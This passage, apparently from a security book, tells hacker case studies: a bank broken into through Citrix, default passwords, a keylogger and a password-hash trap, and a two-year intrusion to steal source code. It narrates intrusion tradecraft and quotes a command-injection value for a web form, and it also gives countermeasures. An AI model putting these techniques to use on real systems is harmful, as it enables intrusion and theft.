companies of their vulnerabilities. Prosecuting can certainly be a lose/
lose situation, especially if the company never learns the particular vulner-
abilities the hacker used to infiltrate its network.
   As a knee-jerk response, firewalls and other defenses are piled on, but
it’s an approach that may completely overlook the unseen flaws that
astute hackers may discover, not to mention all the ones already well-
known to the hacker community. Juhan captured his view on this in a
particularly vivid statement:

     If you try to make your systems foolproof, there is always one more
     fool who is more inventive than you.


THE LONG-DISTANCE BANK HACK
Gabriel speaks French as his native language and lives in a Canadian town
so small that, even though he describes himself as a white-hat hacker and
considers defacing an act of stupidity, he acknowledges that he’s “done it a
time or two when bored to the point of despair,” or when he found a site
“where security was so shoddy someone needed to be taught a lesson.”
   But how does a guy in rural Canada come to hack a bank in a state in
the southern United States, right in the heart of Dixie? He found a Web
site that showed “what IP address ranges (netblocks) were assigned to
particular organizations.”1 He searched the list “for words such as gov-
ernment, bank, or whatever,” and it would pop up some IP range (for
example, 69.75.68.1 to 69.75.68.254), which he would then scan.
   One of the items that he stumbled onto was an IP address that
belonged to a particular bank in the heart of Dixie. That launched
Gabriel into what would become an intensive hack.
144                          The Art of Intrusion


A Hacker Is Made, Not Born
At age 15 (which, as you may have noted from previous chapters, ranks
as a late start, something like taking up basketball in high school and
going on to the NBA), Gabriel had advanced from playing games like
Doom to hacking with a friend on his 386 machine with its 128MB hard
drive. When the machine proved too slow for what he wanted to do,
Gabriel spent what was for him a fortune playing network games at the
local computer café.
   The world of computers was addictive and sweet relief from the harsh
competitiveness of high school, where Gabriel endured daily teasing by
peers, simply because he was different. It didn’t help that he was the new
kid on the block and the youngest in his class, having started his schooling
in another province before his family moved. No one ever said it was easy
being a geek.
   His parents, who both work for the government, couldn’t understand
their son’s obsession with the machines, but then this seems a common
problem for generations raised in technologically night-and-day time
periods. “They never wanted me to buy a computer,” he recalls. What
they wanted was that he “just get out and do something else.” Mom and
Dad were so worried about their boy that they sent him to a psycholo-
gist to help “normalize” him. Whatever happened in those sessions, it
definitely didn’t result in the gangly teenager’s giving up his passion for
computers.
   Gabriel took Cisco courses at a local trade college. Completely self-
taught, he often knew more than the teachers, who would sometimes
defer difficult explanations to him. The now 21-year-old Canadian seems
to have the kind of hacker talent that allows making discoveries on his
own. Even when it’s a well-known exploit, the ability marks the hacker as
living in a different world from the “script kiddies,” who discover nothing
on their own, but rather just download goodies from the Web.
   One program he favored was called Spy Lantern Keylogger. This is
another of those programs with the ability to electronically shadow peo-
ple as they work, allowing the hacker to secretly intercept every keystroke
typed on the target’s computer system — except that this one is suppos-
edly completely invisible on the target’s machine.
   In addition, he also used the “shadowing” feature of an application called
Citrix MetaFrame (an on-demand enterprise access suite), which is
designed to allow system administrators to monitor and assist company
employees. With the shadowing feature, the system administrator can
covertly look over the shoulder of a user, seeing everything on his or her
computer screen and what the user is doing and typing, and can even take
over control of the computer. A knowing hacker who can locate a company
             Chapter 7   Of Course Your Bank Is Secure — Right?          145

running Citrix may be able to do the same: take over computers. This
obviously requires great caution. If he’s not careful, the hacker’s actions
will be spotted, since anyone sitting at the computer will see the result of
the actions that the attacker is taking (the cursor moving, applications
opening, and so forth). But the opportunity can also provide a hacker
with a chance for some innocent fun.

     I see people writing emails to their wife or something. You can
     actually move their mouse in the screen. Pretty funny.
     Once I got on a guy’s computer and started moving his cursor. He
     opened a notepad file. I typed in “Hey.”

  Naturally, a hacker who wants to take over someone’s computer ordi-
narily chooses a time when no one is likely to be around. “I usually do
that after midnight,” Gabriel explained, “to be sure there’s no one there.
Or I just check on their computer screen. If the screensaver is running,
that usually means no one is at the computer.”
  But one time he misjudged and the user was at his machine. The words,
“I know you’re looking at me!” flashed across Gabriel’s screen. “I logged
off right away.” Another time, some files he had stashed were found.
“They deleted them and left me a message — ‘WE WILL PROSECUTE
YOU TO THE FULLEST EXTENT OF THE LAW.’”


The Bank Break-In
When Gabriel’s wandering around the Internet brought up details about
IP addresses of the Dixie bank, he followed the trail, discovering that it
was no small-town bank he’d stumbled onto but one with extensive
national and international ties. Even more interesting, he also found that
one the bank’s servers was running Citrix MetaFrame, which is server
software that allows a user to remotely access his or her workstation. A
lightbulb went on because of something that Gabriel and a friend had
realized from their earlier hacking experiences.

     This friend and I had discovered that most of the systems running
     Citrix services don’t have good passwords. They deliver them
     already enabled, but leave the end user without a password.

  Gabriel went to work with a port scanner, a hacker tool (or auditing
tool, depending on the user’s intent) that scans other networked com-
puters to identify open ports. He was looking specifically for any systems
with port 1494 open, because that’s the port used to remotely access the
Citrix terminal services. So any system with port 1494 open was a poten-
tial system he could successfully “own.”
146                          The Art of Intrusion


   Each time he found one, he’d search every file on the computer for the
word password. It’s like panning for gold. Much of the time, you come up
empty-handed, but occasionally you discover a nugget. In this case, a
nugget might be a reminder that someone had stuck in a file, maybe read-
ing something like, “administrator password for mail2 is ‘happyday.’”
   In time, he found the password to the bank’s firewall. He tried con-
necting to a router, knowing that some common routers come with a
default password of “admin” or “administrator,” and that many
people — not just clueless homeowners but, too often, even IT support
professionals — deploy a new unit without any thought of changing the
default password. And, in fact, that’s what Gabriel found here — a router
with a default password.
   Once he had gained access, he added a firewall rule, allowing incoming
connections to port 1723 — the port used for Microsoft’s Virtual Private
Network (VPN) services, designed to allow secure connectivity to the
corporate network for authorized users. After he had successfully authen-
ticated to the VPN service, his computer was assigned an IP address on
the bank’s internal network. Fortunately for him, the network was “flat,”
meaning that all systems were accessible on a single network segment, so
that hacking into the one machine had given him access to other com-
puter systems on the same network.
   The hack into the bank, Gabriel says, was so easy it was “pretty dumb.”
The bank had brought in a team of security consultants, who provided a
report when they left. Gabriel discovered the confidential report stored
on a server. It included a list of all the security vulnerabilities that the
team had found — providing a handy blueprint of how to exploit the rest
of the network.
   As a server, the bank was using an IBM AS/400, a machine Gabriel had
little experience with. But he discovered that the Windows domain server
stored a complete operations manual for the applications used on that
system, which he downloaded. When he next typed in “administrator” —
the default IBM password — the system let him in.

      I’d say 99 percent of the people working there used “password123”
      as their password. They also didn’t have an anti-virus program
      running in the background. They ran it maybe once a week or so.

  Gabriel felt free to install Spy Lantern Keylogger, his favorite in the cat-
egory primarily because of the program’s unique ability to record infor-
mation simultaneously from any number of people logging in to the
Citrix server. With this installed, Gabriel waited until an administrator
logged in, and “snarfed” his password.
             Chapter 7   Of Course Your Bank Is Secure — Right?       147

   Armed with the right passwords, Gabriel hit the jackpot: a full set of
online training manuals on how to use the critical applications on the
AS/400. He had the ability to perform any activity a teller could —
wiring funds, viewing and changing customer account information,
watching nationwide ATM activity, checking bank loans and transfers,
accessing Equifax for credit checks, even reviewing court files for back-
ground checks. He also found that from the bank’s site, he could access
the computer database of the state’s Department of Motor Vehicles.
   Next he wanted to obtain the password hashes from the primary
domain controller (PDC), which authenticates any login requests to the
domain. His program of choice for doing this was PwDump3, which
extracts all the password hashes from a protected part of the system reg-
istry. He got administrator access locally on the machine, then added a
script to execute PwDump3 as a shortcut in the startup folder, disguising
it as something innocuous.
   Gabriel was laying in wait for a domain administrator to log in to the
target machine. The program operates much like a booby trap, springing
when triggered by a particular event — in this case, a system administra-
tor logging in. When that administrator logs in, the password hashes are
silently extracted to a file. The PwDump3 utility is run from the admin-
istrator’s startup folder. “Sometimes it takes days [for a domain adminis-
trator to log in],” he says, “but it’s worth the wait.”
   Once the unsuspecting domain administrator logged in, he unknowingly
extracted the password hashes to a hidden file. Gabriel returned to the
scene of the crime to obtain the password hashes, and ran a password-
cracking program using the most powerful computer he was able to access.
   On such a system, a simple password such as “password” can take less
than a second to break. Windows passwords seem to be particularly easy,
while a complicated password that uses special symbols can take much
longer. “I had one that took me an entire month to decrypt,” Gabriel
recalled ruefully. The bank administrator’s password consisted of only four
lowercase letters. It was cracked faster than you could read this paragraph.


Anyone Interested in a Bank Account
in Switzerland?
Some of the items Gabriel found made the rest of the haul seem like small
potatoes.
  He also found his way into one of the most supersensitive parts of any
bank’s operation — the process for generating wire transfers. He found
the menu screens for initiating the process. He also discovered the actual
148                         The Art of Intrusion


online form used by the select group of authorized employees who have
the authority to process transactions for withdrawing funds from a cus-
tomer’s account and sending the funds electronically to another financial
institution that might be on the other side of the world (in Switzerland,
for example).
  But a blank form doesn’t do any good unless you know how to prop-
erly complete it. That, it turned out, wasn’t a problem either. In the
instruction manual he had earlier located, one chapter proved particularly
interesting. He didn’t need to get very far into the chapter to find what
he needed.

  20.1.2 Enter/Update Wire Transfers
  Menu: Wire Transfers (WIRES)
  Option: Enter/Update Wire Transfers
  This option is used to enter non-repetitive wires and to select
  repetitive wires to be entered and sent. Non-repetitive wires are for
  customers who only send a wire occasionally or for noncustomers
  who want to initiate a wire. Through this option, incoming wires
  can also be maintained after they are uploaded. When this option
  is selected the following screen will be displayed.

 Wire Transfers
  Wire Transfers 11:35:08
  Outgoing
  Type options, press Enter.
  2=Change 4=Delete 5=Display Position to...
  Opt From account To beneficiary Amount
  F3=Exit F6=Add F9=Incoming F12=Previous
  When this option is initially taken there will not be any wires listed.
  To add, press F6=Add and the following screen will be displayed.

  An entire chapter spelled out step-by-step the exact procedures for
sending a wire from that particular bank, transferring funds to some per-
son’s account at another financial institution. Gabriel now knew every-
thing he needed for sending a wire transfer. He had the keys to the castle.


Aftermath
Despite such widespread access to the bank’s system and an enormous
amount of unauthorized power at his disposal, Gabriel to his credit kept
his hand out of the till. He had no interest in stealing funds or sabotag-
ing any of the bank’s information, though he did play around with the
idea of improving the credit ratings for a few buddies. As a student
              Chapter 7   Of Course Your Bank Is Secure — Right?              149

enrolled in a security program at a local college, Gabriel naturally assessed
the weaknesses in the bank’s protective measures.

     I found a lot of documents on their server about physical security,
     but none of it was related to hackers. I did find something about
     the security consultants they hire every year to check on the servers,
     but that isn’t enough for a bank. They’re doing a good job on phys-
     ical security, but not enough for computer security.


INSIGHT
The bank site in Estonia was an easy target. Juhan noticed the flaw when
he viewed the source code of the bank’s Web pages. The code used a hid-
den form element that contained the filename of a form template, which
was loaded by the CGI script and displayed to users in their Web browser.
He changed the hidden variable to point to the server’s password file,
and, voilà, the password file was displayed in his browser. Amazingly, the
file was not shadowed, so he had access to all the encrypted passwords,
which he later cracked.
   The Dixie bank hack provides another example of the need for defense
in depth. In this instance, the bank’s network appeared to be flat; that is,
without significant protection beyond the single Citrix server. Once any
system on the network was compromised, the attacker could connect to
every other system on the network. A defense-in-depth model could have
prevented Gabriel from gaining access to the AS/400.
   The bank’s information security staff was lulled into a false sense of secu-
rity in having an external audit performed, which may have unreasonably
raised the confidence level in their overall security posture. While per-
forming a security assessment or audit is an important step to measure
your resilience against an attack, an even more crucial process is properly
managing the network and all the systems that are on it.


COUNTERMEASURES
The online bank site should have required that all Web application devel-
opers adhere to fundamental secure programming practices, or require
auditing of any code put into production. The best practice is to limit the
amount of user input that is passed to a server-side script. Using hard-
coded filenames and constants, while not eloquent, raises the level of
assurance in the security of the application.
  Lax network monitoring and poor password security on the exposed
Citrix server were the biggest mistakes in this case, and would likely have
150                          The Art of Intrusion


prevented Gabriel from roaming through their network, installing key-
stroke loggers, shadowing other authorized users, and planting Trojan
programs. The hacker wrote a little script and put it into the administra-
tor’s startup folder so when he logged in, it would run the pwdump3
program silently. Of course, he already had administrator rights. The hacker
was lying in wait for a domain administrator to log in so he could hijack his
privileges and automatically extract the password hashes from the primary
domain controller. The hidden script is often called a Trojan or a trapdoor.
  A partial list of countermeasures would include the following:

      ●    Check all accounts for password last set time on system serv-
           ices accounts like ‘TsINternetUser’ not assigned to personnel,
           unauthorized administrator rights, unauthorized group rights,
           and time of last login. These periodic checks may lead to iden-
           tifying a security incident. Look for passwords that were set
           during strange hours, since the hacker might not realize he or
           she is leaving an audit trial by changing account passwords.
      ●    Restrict interactive logins to business hours.
      ●    Enable login and logout auditing on all systems that are exter-
           nally accessible via wireless, dial-up, Internet, or extranet.
      ●    Deploying software like SpyCop (available at www.spycop.
           com) to detect unauthorized keystroke loggers.
      ●    Be vigilant in installing security updates. In some environ-
           ments, it may be appropriate to download the latest updates
           automatically. Microsoft is actively encouraging customers to
           configure their computer systems to do this.
      ●    Check externally accessible systems for remote-control soft-
           ware such as WinVNC, TightVNC, Damware, and so on.
           These software programs, while they have legitimate uses, can
           enable an attacker to monitor and control sessions logged in
           to the system console.
      ●    Carefully audit any logins using Windows Terminal Services
           or Citrix MetaFrame. Most attackers chose to use these serv-
           ices in preference to remotely controlled programs, to reduce
           the chance of being detected.


THE BOTTOM LINE
The hacks in this chapter were trivial. based on taking advantage of the
companies’ poor password security, and vulnerable CGI scripts. While
many people — even people knowledgeable about computer security —
                 Chapter 7      Of Course Your Bank Is Secure — Right?                       151

tend to think of hacker break-ins as something more like an “Oceans
Eleven” strategic attack, the sad truth is that most of these attacks aren’t
ingenious or clever. They are, instead, successful because a large portion
of enterprise networks are not adequately protected.
  Also, the people responsible for developing and placing these systems
into production are making simple configuration errors or programming
oversights that create an opportunity for the thousands of hackers bang-
ing on the front door every day.
  If the two financial institutions described in this chapter give any indi-
cation of how most of the world’s banks are currently protecting client
information and funds, then we may all decide to go back to hiding our
cash in a shoebox under the bed.


NOTES
1. Though he didn’t specify the site, this information is available at www.flumps.org/ip/.
             Chapter 8
                  Your Intellectual
                 Property Isn’t Safe
If one thing didn’t work, I’d just try something else because I knew there
was something that would work. There is always something that works. It’s
just a matter of finding out what.
                                                                   — Erik




 W
              hat’s the most valuable asset in any organization? It’s not the
              computer hardware, it’s not the offices or factory, it’s not
              even what was claimed in the once-popular corporate cliché
that said, “Our most valuable asset is our people.”
  The plain fact is that any of these can be replaced. Okay, not so easily,
not without a struggle, but plenty of companies have survived after their
plant burned down or a bunch of key employees walked out the door.
Surviving the loss of intellectual property, however, is another story alto-
gether. If someone steals your product designs, your customer list, your
new-product plans, your R&D data — that would be a blow that could
send your company reeling.
  What’s more, if someone steals a thousand products from your ware-
house, or a ton of titanium from your manufacturing plant, or a hundred
computers from your offices, you’ll know it immediately. If someone
electronically steals your intellectual property, what they’re stealing is a
copy and you’ll never know it’s gone until long afterward (if ever), when
the damage is done and you’re suffering the consequences.
  So, it may come as distressing news that people with hacking skills are
stealing intellectual property every day — and often from companies that

                                     153
154                         The Art of Intrusion


are probably no less security-conscious than your own, as suggested by
the two examples in this chapter.
  The two guys in the following pair of stories belong to a special breed
referred to as crackers, a term for hackers who “crack” software by
reverse-engineering commercial applications or stealing the source code
to these application programs, or licensing code, so they can use the soft-
ware for free and eventually distribute through a labyrinth of under-
ground cracking sites. (This use is not to be confused with “cracker” as
a program for cracking passwords.)
  Typically, there are three motivations for a cracker to go after a partic-
ular product:

      ●    To obtain software that he or she has a special interest in and
           wants to examine closely.
      ●    To tackle a challenge and see whether he or she can outwit a
           worthy opponent (usually the developer), just the way some-
           one else tries to outwit opponents at chess, bridge, or poker.
      ●    To post the software so it’s available to others in a secret
           online world that deals in making valuable software available
           free. The crackers are not just after the software itself but also
           the code used to generate the licensing key.

   Both characters in these stories are compromising target software man-
ufacturers to steal source code so they can release a patch or key genera-
tor (“keygen”), the very proprietary code used for generating customer
license keys, to cracking groups so that they can essentially use the soft-
ware for free. There are many people with hacking skills that are doing
the same thing, and these software businesses have no idea how hard they
are getting hit.
   Crackers dwell in a dark, well-hidden world where the coin of the realm
is stolen software — intellectual property theft on a scale you will likely
find stunning and frightening. The fascinating last act of the story is
detailed near the end of the chapter, in the section “Sharing: A Cracker’s
World.”


THE TWO-YEAR HACK
Erik is a 30-something security consultant who complains that “When I
report a vulnerability, I often hear, ‘It’s nothing. What’s the big deal?
What’s that gonna do?’” His story demonstrates a much-ignored truism:
It’s not just the big mistakes that will kill you.
                Chapter 8   Your Intellectual Property Isn’t Safe      155

  Some of the following may seem, for those with limited technical
knowledge of the approaches used by hackers, like rather heavy slogging.
What’s fascinating about the chronicle, though, is the way it reveals the
persistence of many hackers. The events related here, which took place
quite recently, reveal Erik to be, like so many others in these pages, dur-
ing the day an ethical hacker was helping businesses protect their infor-
mation assets but was lured into the thrill of hacking into unsuspecting
targets at night.
  Erik belongs to that special breed of hackers who set their sights on
breaking into a place and stick to the task until they succeed ... even if it
takes months or years.


A Quest Starts
A few years ago, Erik and some long-distance hacker buddies had been
collecting different types of server software and had reached the point
where they “owned the source code” of all the major products in the
category . . . with only a single exception. “This was the last one I didn’t
have,” he explains, “and I don’t know why, it was just interesting to me
to break into that one.” I understand the attitude perfectly. Erik was into
trophy hunting, and the more valuable the asset, the bigger the trophy.
  This last one to make Erik feel complete turned out to be more of a
challenge than he had anticipated. “There are some sites that I want to
break into, but they are truly difficult for some reason,” he explains sim-
ply. I can relate to that attitude, as well.
  He began in a familiar way, with “a port scan of the Web server that is
probably the first place I look when I’m trying to break into Web servers.
There’s usually more exposure there. But I couldn’t find anything right
off.” It’s common to probe a target lightly when getting started with an
attack to avoid generating alerts or being noticed by an administrator
because of entries in the logs — especially these days, since many compa-
nies are running intrusion-detection systems to detect port scans and
other types of probes commonly used by attackers.
  For Erik, “there’s a few ports I’ll look for that I know are going to be
interesting targets.” He rattles off a list of numbers for the ports used for
the Web server, terminal services, Microsoft SQL server, Microsoft Virtual
Private Network (VPN), NetBIOS, mail server (SMTP), and others.
  On a Windows server, port 1723 (as mentioned in Chapter 7, “Of
Course Your Bank Is Secure — Right?”) is ordinarily used for a protocol
known as point-to-point tunnel, which is Microsoft’s implementation
of VPN communications and uses Windows-based authentication. Erik
156                           The Art of Intrusion


has found that probing port 1723 “gives me an idea of what kind of role
the server plays” and, as well, “sometimes you can guess or brute-force
passwords.”
   He doesn’t even bother trying to hide his identity at this stage because
“there’s so many port scans [a company] will get every day that no one
even cares. One port scan out of a hundred thousand in a day, it doesn’t
mean anything.”
   (Erik’s assessment of the low risk of being detected and possibly iden-
tified is based on his risky assumption that his port scans will be buried in
the “noise” of the Internet. True, the target company’s network admin-
istrators may be too overworked or lazy to examine the logs, but there’s
always a chance he’ll run into a zealous type and get busted. It’s a chance
more cautious hackers are not willing to take.)
   Despite the risk, in this case the port scans didn’t turn up anything use-
ful. Then, using a custom-built piece of software that worked much like
a common gateway interface (CGI) scanner, he found a log file generated
by the “WS_FTP server,” which contains, among other things, a listing
of the filenames that were uploaded to the server. It’s similar to any other
FTP (File Transfer Protocol) log, Erik says, “except that the log was
stored in each directory that files were uploaded to,” so when you see a
file listed in the log that looks interesting, it’s right there — you don’t
have to go hunting for it.
   Erik analyzed the FTP log and found the names of files that had been
recently uploaded to the “/include” directory, a directory ordinarily used
to store “.inc” file types — common programming functions that are
from other main source code modules. Under Windows 2000, these files
are by default not protected. After reviewing the list of filenames in the
log, Erik used his Internet browser to view the source code of particular
filenames he thought might contain valuable information. Specifically, he
looked at files that might have included the passwords for a back-end
database server. And he eventually hit pay dirt.
   “At that point,” Erik said, “I probably made ten hits to the Web
server — you know, still nothing major in the logs.” Although his dis-
covery of the database passwords was exciting, he quickly found that
there was no database server on that box.
   But from there, things turned “interesting.”

      I couldn’t find anything on that Web server, but I had a [software]
      tool I made that guesses host names based on a list of common host
      names — like gateway, backup, test, and so on, plus the domain
      name. It goes through a list of common host names to identify any
      host names that may exist in the domain.
                Chapter 8   Your Intellectual Property Isn’t Safe            157

     People are pretty predictable in [choosing hostnames], so it’s pretty
     simple to find the servers.

  Finding the servers was easy enough, but it still didn’t lead him any-
where. Then it struck him: This company wasn’t in the United States. So
“I used that country’s extension, and tried it with a whole bunch of the
hosts I had found with my host name scanning tool.” For example, for a
Japanese company it would be

 hostname.companyname.com.jp

  That led him to discover a backup Web and mail server. He accessed it
with the passwords he had found in the “include” (.inc) source files. He
was able to execute commands through a standard system procedure
(xp_cmdshell) that permitted him to run shell commands under whatever
user the SQL server was running — usually under a privileged account.
Triumph! This gave him full system access to the Web/mail server.
  Erik immediately proceeded to dig into the directories looking for
backups of source code and other goodies. His main objective was to
obtain the keygen — as mentioned, the very proprietary code used for
generating customer license keys. The first order of business was gather-
ing as much information about the system and its users as possible. In
fact, Erik used an Excel spreadsheet to record all interesting information
he found, such as passwords, IP addresses, hostnames, and what services
were accessible through open ports, and so forth.
  He also probed hidden parts of the operating system that the amateur
attacker generally overlooks, such as Local Security Authority (LSA)
secrets, which stores service passwords, cached password hashes of the
last users to log in to the machine, Remote Access Services (RAS) dial-
up account names and passwords, workstation passwords used for
domain access, and more. He also viewed the Protected Storage area
where Internet Explorer and Outlook Express store passwords.1
  His next step was to extract the password hashes and crack them to
recover the passwords. Because the server was a backup domain con-
troller, mail server, and secondary Domain Name Service (DNS) server,
he was able to access all the DNS resource records (including, among
other things, hostnames and corresponding IP addresses) by opening the
DNS management panel, which contained the entire list of domain and
hostnames used by the company.

     Now I had a list of all their hosts and I just gathered passwords
     here and there, hopping from system to system.
158                           The Art of Intrusion


This “puddle jumping” was possible because of his earlier success in
cracking the passwords on the backup Web server, after exploiting the
Microsoft SQL password he had obtained.
  He still didn’t know which servers were the application development
machines, storing the source code of the product and the licensing man-
agement code. Looking for clues, he carefully scrutinized the mail and
Web logs to identify any patterns of activity that would point to these
boxes. Once he gathered a list of other IP addresses from the logs that
looked interesting, he would target these machines. The Holy Grail at
this stage was a developer’s workstation, since any developer would likely
have access to the entire source code collection of files.
  From there, he laid low for several weeks. Beyond collecting passwords,
he wasn’t able to get much for a couple of months, “just kind of down-
loading a little piece of information now and then that I thought useful.”


The CEO’s Computer
This went on for about eight months, as he patiently “hopped around
from server to server” without finding either the source code or the
license key generator. But then, he got a breakthrough. He started look-
ing more closely at the backup Web server he had first compromised and
discovered that it stored the logs of anyone retrieving email, listing the
username and IP address of all these employees. From an examination of
the logs, he was able to recover the CEO’s IP address. He had finally
identified a valuable target.

      I finally found the CEO’s computer and that was kind of inter-
      esting. I port-scanned it for a couple of days and there would just
      be no response, but I knew his computer was there. I could see in
      the email headers that he would use a fixed IP address, but he was
      never there.
      So I finally tried port-scanning his box, checking a few common
      ports every two hours to stay under the radar in case he was run-
      ning any kind of intrusion-detection software. I would try at dif-
      ferent times of day, but would limit the number of ports to no
      more than 5 in any 24-hour period.
      It took me a few days to actually find a port open at the time he
      was there. I finally found one port open on his machine — 1433,
      running an instance of MS SQL server. It turns out it was his
      laptop and he was only on for like two hours every morning. So,
      he’d come in his office, check his emails, and then leave or turn his
      laptop off.
                Chapter 8   Your Intellectual Property Isn’t Safe         159


Getting into the CEO’s Computer
By then Erik had gathered something like 20 to 30 passwords from the
company. “They had good, strong passwords, but they followed patterns.
And once I figured out their patterns, I could easily guess the passwords.”
  At this point, Erik estimates, he had been working on this for some-
thing like a full year. And then his efforts were rewarded with a major
breakthrough.
  Erik was getting to the point were he felt he was gaining a grasp on the
company’s password strategy, so he went back to try tackling the CEO’s
computer once again, taking stabs at the password. What made him think
he might be able to guess what password the CEO might be using for
MS SQL Server?

     You know, the truth is, I can’t explain it. It’s just an ability I
     have to guess the passwords people use. I can also know what sort
     of passwords they would use in the future. I just have a sense for
     that. I can feel it. It’s like I become them and say what password
     I would use next if I was them.

  He’s not sure whether to call it luck or skill, and shrugs off the ability
with “I’m a good guesser.” Whatever the explanation, he actually came
up with the right password, which he remembers as “not a dictionary
word, but something more complicated.”
  Whatever the explanation, he now had the password that gave him
access to the SQL server as a database administrator. The CEO was
“owned.”
  He found the computer to be well protected, with a firewall, and only
one port open. But in other ways, Erik found plenty to sneer at. “His sys-
tem was really messy. I couldn’t find anything on there. I mean there
were just files everywhere.” Not understanding the foreign language that
most everything was written in, Erik used some online dictionaries and a
free online translator service called “Babblefish” to hunt for keywords.
He also had a friend who spoke the language, which helped. From the
chat logs, he was able to find more IP addresses and more passwords.
  Since the files on the laptop were too disorganized to find anything of
value, Erik turned to a different approach, using “dir /s /od <drive letter>”
to list and sort all the files by date so he could look at the ones recently
accessed on the drives, and examine them offline. In the process he dis-
covered an obvious name for an Excel spreadsheet that contained several
passwords for different servers and applications. From it, he identified a
valid account name and password to their primary DNS server.
160                         The Art of Intrusion


   To make his next tasks easier — gaining a better foothold, and more
easily upload and download files — he wanted to move onto the CEO’s
laptop his hacker’s toolkit. He was only able to communicate with the
laptop through his Microsoft SQL server connection but was able to use
the same stored procedure mentioned earlier for sending commands to
the operating system as if he were sitting at a DOS prompt in Windows.
Erik wrote a little script to cause the FTP to download his hacker tools.
When nothing happened on his three attempts, he used a command-line
program already on the laptop called “pslist” to list out the running
processes.
   Big mistake!
   Since the CEO’s laptop was running its own personal firewall (Tiny
Personal Firewall), each attempt to use FTP popped up a warning box on
the CEO’s screen, requesting permission to connect out to the Internet.
Fortunately the CEO had already downloaded a common set of command-
line tools from www.sysinternals.com to manipulate processes. Erik used
“pskill” utility to kill the firewall program so the pop-up dialog boxes
would disappear before the CEO saw them.
   Once again Erik figured it would be wise to lay low for a couple of
weeks just in case anyone had been noticing his activities. When he
returned, he tried a different tack for attempting to get his tools onto the
CEO’s laptop. He wrote a script to retrieve several of his hacking tools
by using an “Internet Explorer object” that would trick the personal
firewall into believing that Internet Explorer was requesting permission
to connect to the Internet. Most everyone allows Internet Explorer to
have full access through their personal firewall (I bet you do, too), and
Erik was counting on his script being able to take advantage of this. Good
call. It worked. He was then able to use his tools to begin searching the
laptop and extracting information.


The CEO Spots a Break-in
These same methods, Erik said, would still work today.
  On a later occasion, while connected to the CEO’s computer, Erik
again killed the firewall so he could transfer files to another system from
which he would be able to download them. During this, he realized the
CEO was at his computer and must have noticed something strange
going on. “He saw the firewall icon missing from the system tray. He saw
I was on.” Erik immediately got off. After a couple of minutes, the note-
book was rebooted, and the firewall had started up again.
               Chapter 8   Your Intellectual Property Isn’t Safe        161

     I didn’t know if he was on to me. So I waited a couple of weeks
     before I went back and tried it again. I eventually learned what
     his work patterns were, when I could get onto his system.


Gaining Access to the Application
After laying low and rethinking his strategy, Erik got back into the CEO’s
laptop and starting examining the system more closely. First he ran a pub-
licly available command-line tool known as LsaDump2, to dump sensi-
tive information stored in a special part of the registry called Local
Security Authority Secrets. LSA Secrets contains plaintext passwords for
service accounts, cached password hashes of the last 10 users, FTP and
Web user passwords, and the account names and passwords used for dial-
up networking.
   He also ran the “netstat” command to see what connections were
established at that moment, and what ports were listening for a connec-
tion. He noticed there was a high port listening for an incoming con-
nection. Connecting to the open port from the backup server he
compromised earlier, he recognized it was a lightweight Web server
being used as some sort of mail interface. He quickly realized that he
could bypass the mail interface and place any files onto the server’s root
directory used for the mail interface. He would then be able to easily
download files from the CEO’s laptop to the backup server.
   Despite minor successes over the year, Erik still didn’t have the source
code to the product, or the key generator. However, he had no thoughts
of giving up. In fact, things were just getting interesting. “I found a
backup of the ‘tools’ directory on the CEO’s laptop. In it was an inter-
face to a key generator but it didn’t have access to the live database.”
   He hadn’t found the licensing server that was running the live database
containing all the customer keys — only something pointing to it. “I didn’t
know where the actual licensing tools were located for employees. “I needed
to find the live server.” He had a hunch it was on the same server as their
mail server, since the company operated a Web site that allowed customers
to immediately purchase the software product. Once the credit card trans-
action was approved, the customer would receive an email with the licens-
ing key. There was only one server left that Erik hadn’t been able to locate
and break into; it must be the one that held the application for generating
the licensing key.
   By now Erik had spent months in the network and still didn’t have
what he was after. He decided to poke around the backup server he had
compromised earlier and started scanning the mail server from the other
162                          The Art of Intrusion


servers he already “owned,” using a broader range of ports, hoping to
discover some services running on nonstandard ports. He also thought it
would be best to scan from a trusted server just in case the firewall was
only allowing certain IP addresses.
   Over the next two weeks he scanned the network as quietly as possible
to identify any servers that were running unusual services, or attempting
to run common services on nonstandard ports.
   While continuing his port-scanning tasks, Erik started examining the
Internet Explorer history files of the administrator account and several
users. This led to a new discovery. Users from the backup server were
connecting to a high-numbered port on the main mail server using
Internet Explorer. He realized that the main mail server was also block-
ing access to this high-numbered port unless the connection was from an
“authorized” IP address.
   Finally he found a Web server on a high port — “1800 or something
like that,” he remembers — and was able to guess a username and pass-
word combination that brought up a menu of items. One option was to
look up customer information. Another was to generate licensing keys for
their product.
   Bingo!
   This was the server with the live database. Erik was starting to feel his
adrenaline pump as he realized he was getting close to his goal. But “this
server was really tight, incredibly tight.” Once again he had run into a
dead end. He backtracked, thought things through, and came up with a
new idea:

      I had the source code for these Web pages because of the backup of
      the Web site I found on the CEO’s laptop. And I found a link on
      the Web page for some network diagnostics, like netstat, trace-
      route and ping — you could put an IP address into the web form,
      and click “OK,” and it would run the command and display the
      results on your screen.

  He had noticed a bug in a program that he could run when he logged
in to the Web page. If he chose the option to do a tracert command, the
program would allow him to do a traceroute — tracing the route that
packets take to the destination IP address. Erik realized that he could
trick the program into running a shell command by entering an IP
address, followed by the “&” symbol, and then his shell command. So,
he would enter something in the form of the following:

  localhost > nul && dir c:\
                Chapter 8   Your Intellectual Property Isn’t Safe           163

In this example, the information entered into the form is post-appended
to the traceroute command by the CGI script. The first part (up to the
“&” symbol) tells the program to do a traceroute command to itself
(which is useless), and redirect the output to nul, which causes the out-
put to be “dropped in the bit bucket” (that is, to go nowhere). Once the
program has executed this first command, the “&&” symbols indicate
there is another shell command to be executed. In this case, it’s a com-
mand to display the contents of the root directory on the C drive —
extremely useful to the attacker because it allows him or her to execute
any arbitrary shell commands with the privileges of the account the Web
server is running under.
  “It gave me all the access I needed,” Erik said. “I pretty much had
access to everything on the server.”
  Erik got busy. He soon noticed that the company’s developers would
put a backup of their source code on the server every night. “It was a
pile — the entire backup is about 50 megs.” He was able to execute a
series of commands to move any files he wanted to the root directory of
the Web server, and then just download them to the first machine he had
broken into, the backup Web server.


Caught!
The CEO incident had been a close call. Apparently, the executive had
been suspicious, but with his busy schedule and Erik’s increasing stealth,
there’d been no more alarms. However, as he delved further and further
into the heart of the company’s system, it became more difficult for Erik
to maintain a low profile. What happened next is frequently the cost of
pushing a hack to the limits while maintaining a long-time presence in an
alien system. He was starting to download the source code of the long-
sought program, when

     About half way through I noticed that my download stopped. I
     looked into the directory and the file was gone. I started looking
     at some of the log files and modified dates and I realized that this
